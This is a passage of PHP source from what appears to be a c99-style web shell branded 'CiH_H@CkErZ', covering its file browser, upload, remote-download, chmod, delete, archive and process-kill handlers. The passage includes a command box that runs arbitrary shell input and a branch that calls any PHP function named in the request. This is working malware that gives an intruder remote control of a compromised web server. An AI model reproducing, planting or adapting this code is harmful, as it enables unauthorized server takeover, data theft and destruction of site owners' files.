1938 }
1939 else {
1940 echo "<form action=\"".$surl."\" method=POST>".
1941 "<input type=hidden name=act value=feedback>".
1942 "<table class=contents><tr><td class=barheader colspan=2>".
1943 ".: Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail).") :.</td></tr>".
1944 "<tr><td>Your name:</td><td><input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"></td</tr>".
1945 "<tr><td>Your e-mail:</td><td><input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"></td></tr>".
1946 "<tr><td>Message:</td><td><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br>".
1947 "<input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked> Attach Server info (Recommended for bug-fix)<br>".
1948 "*Language: English, Indonesian.</td></tr>".
1949 "<tr><td></td><td><input type=\"submit\" name=\"submit\" value=\"Send\"></form></td></tr>".
1950 "</table>\n";
1951 }
1952 }
1953
1954 if ($act == "search") {
1955 echo "<div class=barheader>.: $ch_name File-System Search :.</div>";
1956 if (empty($search_in)) {$search_in = $d;}
1957 if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
1958 if (empty($search_text_wwo)) {$search_text_regexp = 0;}
1959 if (!empty($submit)) {
1960 $found = array();
1961 $found_d = 0;
1962 $found_f = 0;
1963 $search_i_f = 0;
1964 $search_i_d = 0;
1965 $a = array(
1966 "name"=>$search_name,
1967 "name_regexp"=>$search_name_regexp,
1968 "text"=>$search_text,
1969 "text_regexp"=>$search_text_regxp,
1970 "text_wwo"=>$search_text_wwo,
1971 "text_cs"=>$search_text_cs,
1972 "text_not"=>$search_text_not
1973 );
1974 $searchtime = getmicrotime();
1975 $in = array_unique(explode(";",$search_in));
1976 foreach($in as $v) {ch99fsearch($v);}
1977 $searchtime = round(getmicrotime()-$searchtime,4);
1978 if (count($found) == 0) {echo "No files found!";}
1979 else {
1980 $ls_arr = $found;
1981 $disp_fullpath = TRUE;
1982 $act = "ls";
1983 }
1984 }
1985 echo "<table class=contents>".
1986 "<tr><td><form method=POST>".
1987 "<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\">".
1988 "File or folder Name:</td><td><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\"> <input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - Regular Expression</td></tr>".
1989 "<tr><td>Look in (Separate by \";\"):</td><td><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\"></td></tr>".
1990 "<tr><td>A word or phrase in the file:</td><td><textarea name=\"search_text\" cols=\"50\" rows=\"5\">".htmlspecialchars($search_text)."</textarea></td></tr>".
1991 "<tr><td></td><td><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> Regular Expression".
1992 " <input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> Whole words only".
1993 " <input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> Case sensitive".
1994 " <input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> Find files NOT containing the text</td></tr>".
1995 "<tr><td></td><td><input type=submit name=submit value=\"Search\"></form></td></tr>".
1996 "</table>\n";
1997 if ($act == "ls") {
1998 $dspact = $act;
1999 echo $searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b>".
2000 "<hr size=\"1\" noshade>";
2001 }
2002 }
2003 if ($act == "chmod") {
2004 $mode = fileperms($d.$f);
2005 if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
2006 else {
2007 $form = TRUE;
2008 if ($chmod_submit) {
2009 $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
2010 if (chmod($d.$f,$octet)) { $act = "ls"; $form = FALSE; $err = ""; }
2011 else {$err = "Can't chmod to ".$octet.".";}
2012 }
2013 if ($form) {
2014 $perms = parse_perms($mode);
2015 echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"")."> Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"")."> Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"")."> Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"")."> Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"")."> Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"")."> Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
2016 }
2017 }
2018 }
2019 if ($act == "upload") {
2020 $uploadmess = "";
2021 $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath);
2022 if (empty($uploadpath)) {$uploadpath = $d;}
2023 elseif (substr($uploadpath,-1) != DIRECTORY_SEPARATOR) {$uploadpath .= DIRECTORY_SEPARATOR;}
2024 if (!empty($submit)) {
2025 global $_FILES;
2026 $uploadfile = $_FILES["uploadfile"];
2027 if (!empty($uploadfile["tmp_name"])) {
2028 if (empty($uploadfilename)) {$destin = $uploadfile["name"];}
2029 else {$destin = $userfilename;}
2030 if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {
2031 $uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";
2032 }
2033 else { $uploadmess .= "File uploaded successfully!<br>".$uploadpath.$destin; }
2034 }
2035 else { echo "No file to upload!"; }
2036 }
2037 if ($miniform) {
2038 echo "<b>".$uploadmess."</b>";
2039 $act = "ls";
2040 }
2041 else {
2042 echo "<table><tr><td colspan=2 class=barheader>".
2043 ".: File Upload :.</td>".
2044 "<td colspan=2>".$uploadmess."</td></tr>".
2045 "<tr><td><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST>".
2046 "From Your Computer:</td><td><input name=\"uploadfile\" type=\"file\"></td></tr>".
2047 "<tr><td>From URL:</td><td><input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"></td></tr>".
2048 "<tr><td>Target Directory:</td><td><input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"></td></tr>".
2049 "<tr><td>Target File Name:</td><td><input name=uploadfilename size=25></td></tr>".
2050 "<tr><td></td><td><input type=checkbox name=uploadautoname value=1 id=df4> Convert file name to lowercase</td></tr>".
2051 "<tr><td></td><td><input type=submit name=submit value=\"Upload\">".
2052 "</form></td></tr></table>";
2053 }
2054 }
2055 if ($act == "delete") {
2056 $delerr = "";
2057 foreach ($actbox as $v) {
2058 $result = FALSE;
2059 $result = fs_rmobj($v);
2060 if (!$result) { $delerr .= "Can't delete ".htmlspecialchars($v)."<br>"; }
2061 }
2062 if (!empty($delerr)) { echo "<b>Error deleting:</b><br>".$delerr; }
2063 $act = "ls";
2064 }
2065 if (!$usefsbuff) {
2066 if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {
2067 echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$usefsbuff\" as TRUE.</center>";
2068 }
2069 }
2070 else {
2071 if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); ch99_sess_put($sess_data); $act = "ls"; }
2072 elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); ch99_sess_put($sess_data); $act = "ls";}
2073 elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} ch99_sess_put($sess_data); $act = "ls";}
2074 if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); ch99_sess_put($sess_data);}
2075 elseif ($actpastebuff) {
2076 $psterr = "";
2077 foreach($sess_data["copy"] as $k=>$v) {
2078 $to = $d.basename($v);
2079 if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
2080 if ($copy_unset) {unset($sess_data["copy"][$k]);}
2081 }
2082 foreach($sess_data["cut"] as $k=>$v) {
2083 $to = $d.basename($v);
2084 if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
2085 unset($sess_data["cut"][$k]);
2086 }
2087 ch99_sess_put($sess_data);
2088 if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
2089 $act = "ls";
2090 }
2091 elseif ($actarcbuff) {
2092 $arcerr = "";
2093 if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
2094 else {$ext = ".tar.gz";}
2095 if ($ext == ".tar.gz") {$cmdline = "tar cfzv";}
2096 $cmdline .= " ".$actarcbuff_path;
2097 $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
2098 foreach($objects as $v) {
2099 $v = str_replace("\\",DIRECTORY_SEPARATOR,$v);
2100 if (substr($v,0,strlen($d)) == $d) {$v = basename($v);}
2101 if (is_dir($v)) {
2102 if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}
2103 $v .= "*";
2104 }
2105 $cmdline .= " ".$v;
2106 }
2107 $tmp = realpath(".");
2108 chdir($d);
2109 $ret = ch99exec($cmdline);
2110 chdir($tmp);
2111 if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";}
2112 $ret = str_replace("\r\n","\n",$ret);
2113 $ret = explode("\n",$ret);
2114 if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
2115 foreach($sess_data["cut"] as $k=>$v) {
2116 if (in_array($v,$ret)) {fs_rmobj($v);}
2117 unset($sess_data["cut"][$k]);
2118 }
2119 ch99_sess_put($sess_data);
2120 if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
2121 $act = "ls";
2122 }
2123 elseif ($actpastebuff) {
2124 $psterr = "";
2125 foreach($sess_data["copy"] as $k=>$v) {
2126 $to = $d.basename($v);
2127 if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
2128 if ($copy_unset) {unset($sess_data["copy"][$k]);}
2129 }
2130 foreach($sess_data["cut"] as $k=>$v) {
2131 $to = $d.basename($v);
2132 if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
2133 unset($sess_data["cut"][$k]);
2134 }
2135 ch99_sess_put($sess_data);
2136 if (!empty($psterr)) {echo "<b>Error pasting:</b><br>".$psterr;}
2137 $act = "ls";
2138 }
2139 }
2140 if ($act == "cmd") {
2141 @chdir($chdir);
2142 if (!empty($submit)) {
2143 echo "<div class=barheader>.: Results of Execution :.</div>\n";
2144 $olddir = realpath(".");
2145 @chdir($d);
2146 $ret = ch99exec($cmd);
2147 $ret = convert_cyr_string($ret,"d","w");
2148 if ($cmd_txt) {
2149 $rows = count(explode("\n",$ret))+1;
2150 if ($rows < 10) { $rows = 10; } else { $rows = 30; }
2151 $cols = 130;
2152 echo "<textarea class=shell cols=\"$cols\" rows=\"$rows\" readonly>".htmlspecialchars($ret)."</textarea>\n";
2153 //echo "<div align=left><pre>".htmlspecialchars($ret)."</pre></div>";
2154 }
2155 else { echo $ret."<br>"; }
2156 @chdir($olddir);
2157 }
2158 }
2159 if ($act == "ls") {
2160 if (count($ls_arr) > 0) { $list = $ls_arr; }
2161 else {
2162 $list = array();
2163 if ($h = @opendir($d)) {
2164 while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}
2165 closedir($h);
2166 }
2167 }
2168 if (count($list) == 0) { echo "<div class=ciherrmsg>Can't open folder (".htmlspecialchars($d).")!</div>";}
2169 else {
2170 $objects = array();
2171 $vd = "f"; //Viewing mode
2172 if ($vd == "f") {
2173 $objects["head"] = array();
2174 $objects["folders"] = array();
2175 $objects["links"] = array();
2176 $objects["files"] = array();
2177 foreach ($list as $v) {
2178 $o = basename($v);
2179 $row = array();
2180 if ($o == ".") {$row[] = $d.$o; $row[] = "CURDIR";}
2181 elseif ($o == "..") {$row[] = $d.$o; $row[] = "UPDIR";}
2182 elseif (is_dir($v)) {
2183 if (is_link($v)) {$type = "LINK";}
2184 else {$type = "DIR";}
2185 $row[] = $v;
2186 $row[] = $type;
2187 }
2188 elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
2189 $row[] = filemtime($v);
2190 if (!$win) {
2191 $ow = posix_getpwuid(fileowner($v));
2192 $gr = posix_getgrgid(filegroup($v));
2193 $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
2194 }
2195 $row[] = fileperms($v);
2196 if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
2197 elseif (is_link($v)) {$objects["links"][] = $row;}
2198 elseif (is_dir($v)) {$objects["folders"][] = $row;}
2199 elseif (is_file($v)) {$objects["files"][] = $row;}
2200 $i++;
2201 }
2202 $row = array();
2203 $row[] = "<b>Name</b>";
2204 $row[] = "<b>Size</b>";
2205 $row[] = "<b>Date Modified</b>";
2206 if (!$win) {$row[] = "<b>Owner/Group</b>";}
2207 $row[] = "<b>Perms</b>";
2208 $row[] = "<b>Action</b>";
2209 $parsesort = parsesort($sort);
2210 $sort = $parsesort[0].$parsesort[1];
2211 $k = $parsesort[0];
2212 if ($parsesort[1] != "a") {$parsesort[1] = "d";}
2213 $y = " <a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">";
2214 $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>";
2215 $row[$k] .= $y;
2216 for($i=0;$i<count($row)-1;$i++) {
2217 if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";}
2218 }
2219 $v = $parsesort[0];
2220 usort($objects["folders"], "tabsort");
2221 usort($objects["links"], "tabsort");
2222 usort($objects["files"], "tabsort");
2223 if ($parsesort[1] == "d") {
2224 $objects["folders"] = array_reverse($objects["folders"]);
2225 $objects["files"] = array_reverse($objects["files"]);
2226 }
2227 $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
2228 $tab = array();
2229 $tab["cols"] = array($row);
2230 $tab["head"] = array();
2231 $tab["folders"] = array();
2232 $tab["links"] = array();
2233 $tab["files"] = array();
2234 $i = 0;
2235 foreach ($objects as $a) {
2236 $v = $a[0];
2237 $o = basename($v);
2238 $dir = dirname($v);
2239 if ($disp_fullpath) {$disppath = $v;}
2240 else {$disppath = $o;}
2241 $disppath = str2mini($disppath,60);
2242 if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
2243 elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
2244 foreach ($regxp_highlight as $r) {
2245 if (ereg($r[0],$o)) {
2246 if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; cih99exit();}
2247 else {
2248 $r[1] = round($r[1]);
2249 $isdir = is_dir($v);
2250 if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) {
2251 if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}
2252 $disppath = $r[2].$disppath.$r[3];
2253 if ($r[4]) {break;}
2254 }
2255 }
2256 }
2257 }
2258 $uo = urlencode($o);
2259 $ud = urlencode($dir);
2260 $uv = urlencode($v);
2261 $row = array();
2262 if ($o == ".") {
2263 $row[] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\"><img src=\"".$surl."act=img&img=small_dir\" border=\"0\"> ".$o."</a>";
2264 $row[] = "CURDIR";
2265 }
2266 elseif ($o == "..") {
2267 $row[] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\"><img src=\"".$surl."act=img&img=ext_lnk\" border=\"0\"> ".$o."</a>";
2268 $row[] = "UPDIR";
2269 }
2270 elseif (is_dir($v)) {
2271 if (is_link($v)) {
2272 $disppath .= " => ".readlink($v);
2273 $type = "LINK";
2274 $row[] = "<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\"><img src=\"".$surl."act=img&img=ext_lnk\" border=\"0\"> [".$disppath."]</a>";
2275 }
2276 else {
2277 $type = "DIR";
2278 $row[] = "<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\"><img src=\"".$surl."act=img&img=small_dir\" border=\"0\"> [".$disppath."]</a>";
2279 }
2280 $row[] = $type;
2281 }
2282 elseif(is_file($v)) {
2283 $ext = explode(".",$o);
2284 $c = count($ext)-1;
2285 $ext = $ext[$c];
2286 $ext = strtolower($ext);
2287 $row[] = "<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\"> ".$disppath."</a>";
2288 $row[] = view_size($a[1]);
2289 }
2290 $row[] = @date("d.m.Y H:i:s",$a[2]);
2291 if (!$win) { $row[] = $a[3]; }
2292 $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>";
2293 if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;}
2294 else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";}
2295 if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" border=\"0\"></a> ".$checkbox;}
2296 else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a> <a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"16\" width=\"19\" border=\"0\"></a> <a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\" border=\"0\"></a> ".$checkbox;}
2297 if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;}
2298 elseif (is_link($v)) {$tab["links"][] = $row;}
2299 elseif (is_dir($v)) {$tab["folders"][] = $row;}
2300 elseif (is_file($v)) {$tab["files"][] = $row;}
2301 $i++;
2302 }
2303 }
2304 // Compiling table
2305 $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
2306 echo "<div class=barheader>.: ";
2307 if (!empty($cih_infohead)) { echo $cih_infohead; }
2308 else { echo "Directory List (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders)"; }
2309 echo " :.</div>\n";
2310 echo "<form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=\"".$dspact."\"><input type=hidden name=d value=".$d.">".
2311 "<table class=explorer>";
2312 foreach($table as $row) {
2313 echo "<tr>";
2314 foreach($row as $v) {echo "<td>".$v."</td>";}
2315 echo "</tr>\r\n";
2316 }
2317 echo "</table>".
2318 "<script>".
2319 "function ls_setcheckboxall(status) {".
2320 " var id = 1; var num = ".(count($table)-2).";".
2321 " while (id <= num) { document.getElementById('actbox'+id).checked = status; id++; }".
2322 "}".
2323 "function ls_reverse_all() {".
2324 " var id = 1; var num = ".(count($table)-2).";".
2325 " while (id <= num) { document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked; id++; }".
2326 "}".
2327 "</script>".
2328 "<div align=\"right\">".
2329 "<input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\"> <input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\">".
2330 "<img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">";
2331 if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) {
2332 echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\"> <input type=\"text\" name=\"actarcbuff_path\" value=\"cih_archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\"> <input type=submit name=\"actpastebuff\" value=\"Paste\"> <input type=submit name=\"actemptybuff\" value=\"Empty buffer\"> ";
2333 }
2334 echo "<select name=act><option value=\"".$act."\">With selected:</option>";
2335 echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>";
2336 echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>";
2337 if ($usefsbuff) {
2338 echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>";
2339 echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>";
2340 echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>";
2341 }
2342 echo "</select> <input type=submit value=\"Confirm\"></div>";
2343 echo "</form>";
2344 }
2345 }
2346##[ PHP FILESYSTEM TRICKZ (By CiH_H@CkErZ) ]##
2347 if ($act == "phpfsys") {
2348 echo "<div align=left>";
2349 $fsfunc = $phpfsysfunc;
2350 if ($fsfunc=="copy") {
2351 if (!copy($arg1, $arg2)) { echo "Failed to copy $arg1...\n";}
2352 else { echo "<b>Success!</b> $arg1 copied to $arg2\n"; }
2353 }
2354 elseif ($fsfunc=="rename") {
2355 if (!rename($arg1, $arg2)) { echo "Failed to rename/move $arg1!\n";}
2356 else { echo "<b>Success!</b> $arg1 renamed/moved to $arg2\n"; }
2357 }
2358 elseif ($fsfunc=="chmod") {
2359 if (!chmod($arg1,$arg2)) { echo "Failed to chmod $arg1!\n";}
2360 else { echo "<b>Perm for $arg1 changed to $arg2!</b>\n"; }
2361 }
2362 elseif ($fsfunc=="read") {
2363 $darg = $d.$arg1;
2364 if ($hasil = @file_get_contents($darg)) {
2365 echo "<b>Filename:</b> ".$darg."<br>";
2366 echo "<center><textarea cols=135 rows=30>";
2367 echo htmlentities($hasil);
2368 echo "</textarea></center>\n";
2369 }
2370 else { echo "<div class=ciherrmsg> Couldn't open ".$darg."<div>"; }
2371 }
2372 elseif ($fsfunc=="write") {
2373 $darg = $d.$arg1;
2374 if(@file_put_contents($darg,$arg2)) {
2375 echo "<b>Saved!</b> ".$darg;
2376 }
2377 else { echo "<div class=ciherrmsg>Can't write to $darg!</div>"; }
2378 }
2379 elseif ($fsfunc=="downloadbin") {
2380 $handle = fopen($arg1, "rb");
2381 $contents = '';
2382 while (!feof($handle)) {
2383 $contents .= fread($handle, 8192);
2384 }
2385 $r = @fopen($d.$arg2,'w');
2386 if (fwrite($r,$contents)) { echo "<b>Success!</b> $arg1 saved to ".$d.$arg2." (".view_size(filesize($d.$arg2)).")"; }
2387 else { echo "<div class=ciherrmsg>Can't write to ".$d.$arg2."!</div>"; }
2388 fclose($r);
2389 fclose($handle);
2390 }
2391 elseif ($fsfunc=="download") {
2392 $text = implode('', file($arg1));
2393 if ($text) {
2394 $r = @fopen($d.$arg2,'w');
2395 if (fwrite($r,$text)) { echo "<b>Success!</b> $arg1 saved to ".$d.$arg2." (".view_size(filesize($d.$arg2)).")"; }
2396 else { echo "<div class=ciherrmsg>Can't write to ".$d.$arg2."!</div>"; }
2397 fclose($r);
2398 }
2399 else { echo "<div class=ciherrmsg>Can't download from $arg1!</div>";}
2400 }
2401 elseif ($fsfunc=='mkdir') {
2402 $thedir = $d.$arg1;
2403 if ($thedir != $d) {
2404 if (file_exists($thedir)) { echo "<b>Already exists:</b> ".htmlspecialchars($thedir); }
2405 elseif (!mkdir($thedir)) { echo "<b>Access denied:</b> ".htmlspecialchars($thedir); }
2406 else { echo "<b>Dir created:</b> ".htmlspecialchars($thedir);}
2407 }
2408 else { echo "Can't create current dir:<b> $thedir</b>"; }
2409 }
2410 elseif ($fsfunc=='fwritabledir') {
2411 function recurse_dir($dir,$max_dir) {
2412 global $dir_count;
2413 $dir_count++;
2414 if( $cdir = dir($dir) ) {
2415 while( $entry = $cdir-> read() ) {
2416 if( $entry != '.' && $entry != '..' ) {
2417 if(is_dir($dir.$entry) && is_writable($dir.$entry) ) {
2418 if ($dir_count > $max_dir) { return; }
2419 echo "[".$dir_count."] ".$dir.$entry."\n";
2420 recurse_dir($dir.$entry.DIRECTORY_SEPARATOR,$max_dir);
2421 }
2422 }
2423 }
2424 $cdir->close();
2425 }
2426 }
2427 if (!$arg1) { $arg1 = $d; }
2428 if (!$arg2) { $arg2 = 10; }
2429 if (is_dir($arg1)) {
2430 echo "<b>Writable directories (Max: $arg2) in:</b> $arg1<hr noshade size=1>";
2431 echo "<pre>";
2432 recurse_dir($arg1,$arg2);
2433 echo "</pre>";
2434 $total = $dir_count - 1;
2435 echo "<hr noshade size=1><b>Founds:</b> ".$total." of <b>Max</b> $arg2";
2436 }
2437 else {
2438 echo "<div class=ciherrmsg>Directory is not exist or permission denied!</div>";
2439 }
2440 }
2441 else {
2442 if (!$arg1) { echo "<div class=ciherrmsg>No operation! Please fill parameter [A]!</div>\n"; }
2443 else {
2444 if ($hasil = $fsfunc($arg1)) {
2445 echo "<b>Result of $fsfunc $arg1:</b><br>";
2446 if (!is_array($hasil)) { echo "$hasil\n"; }
2447 else {
2448 echo "<pre>";
2449 foreach ($hasil as $v) { echo $v."\n"; }
2450 echo "</pre>";
2451 }
2452 }
2453 else { echo "<div class=ciherrmsg>$fsfunc $arg1 failed!</div>\n"; }
2454 }
2455 }
2456 echo "</div>\n";
2457 }
2458 if ($act == "processes") {
2459 echo "<div class=barheader>.: Processes :.</div>\n";
2460 if (!$win) { $handler = "ps aux".($grep?" | grep '".addslashes($grep)."'":""); }
2461 else { $handler = "tasklist"; }
2462 $ret = ch99exec($handler);
2463 if (!$ret) { echo "Can't execute \"".$handler."\"!"; }
2464 else {
2465 if (empty($processes_sort)) { $processes_sort = $sort_default; }
2466 $parsesort = parsesort($processes_sort);
2467 if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
2468 $k = $parsesort[0];
2469 if ($parsesort[1] != "a") {
2470 $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" border=\"0\"></a>";
2471 }
2472 else {
2473 $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";
2474 }
2475 $ret = htmlspecialchars($ret);
2476 if (!$win) { //Not Windows
2477 if ($pid) {
2478 if (is_null($sig)) { $sig = 9; }
2479 echo "Sending signal ".$sig." to #".$pid."... ";
2480 if (posix_kill($pid,$sig)) { echo "OK."; } else { echo "ERROR."; }
2481 }
2482 while (ereg(" ",$ret)) { $ret = str_replace(" "," ",$ret); }
2483 $stack = explode("\n",$ret);
2484 $head = explode(" ",$stack[0]);
2485 unset($stack[0]);
2486 for($i=0;$i<count($head);$i++) {
2487 if ($i != $k) {
2488 $head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";
2489 }
2490 }
2491 $head[$i] = "";
2492 $prcs = array();
2493 foreach ($stack as $line) {
2494 if (!empty($line)) {
2495 $line = explode(" ",$line);
2496 $line[10] = join(" ",array_slice($line,10));
2497 $line = array_slice($line,0,11);
2498 if ($line[0] == get_current_user()) { $line[0] = "<font color=green>".$line[0]."</font>"; }
2499 $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
2500 $prcs[] = $line;
2501 }
2502 }
2503 }
2504 //For Windows - Fixed By CiH_H@CkErZ
2505 else {
2506 while (ereg(" ",$ret)) { $ret = str_replace(" "," ",$ret); }
